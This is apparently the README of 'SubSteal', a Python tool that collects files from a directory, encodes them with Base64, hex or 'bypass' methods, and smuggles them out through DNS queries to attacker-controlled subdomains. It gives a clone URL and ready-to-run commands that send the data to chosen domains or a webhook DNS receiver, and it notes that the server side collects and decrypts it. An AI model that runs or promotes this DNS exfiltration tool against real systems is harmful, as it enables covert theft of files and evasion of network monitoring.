SubSteal is a Python script designed to send data to subdomains using various encryption methods. This script can be used to distribute data across multiple domains and query them using different DNS record types.
- Collects files from a specified directory.
- Encodes data using Base64, hexadecimal, and custom bypass methods.
- Sends data to subdomains using DNS queries.
- Supports multiple DNS query modes: TXT, A, NS, and RANDOM.
- Python 3.x
os,subprocess,base64,json,binascii,time,argparse,random,signal,sysmodules (standard Python libraries)- dig
Clone the repository:
git clone https://github.com/mel4mi/SubSteal
cd SubSteal
python3 SubSteal.py
Run the script with the required arguments:
Arguments:
--domains #List of domains to distribute data across (required).
--encryption #Encryption method to use (xxd, low_bypass, medium_bypass) (required).
--mode #Query mode (TXT, A, NS, RANDOM). Default is TXT.
Example Usage:
if you want to divide the packages into more than one domain:
python3 SubSteal.py --domains example.com example2.com --encryption <Encryption_Method>
python3 SubSteal.py --domains example.com example2.com example3.com --encryption <Encryption_Method>
to work on a single domain:
python3 SubSteal.py --domains example.com --encryption <Encryption_Method>
to send the dns record you want:
python3 SubSteal.py --domains example.com --encryption <Encryption_Method> --mode <Query_Mode>
to send random dns records:
python3 SubSteal.py --domains example.com --encryption <Encryption_Method> --mode RANDOM
Try on WebHook:
- Go Webhook
- Copy "Your unique DNS name" Url
- Run the command:
python3 SubSteal.py --domains <Webhook_Dns_Domain> --encryption xxd
Client Side:
Server Side:
- Collect data and decrypt



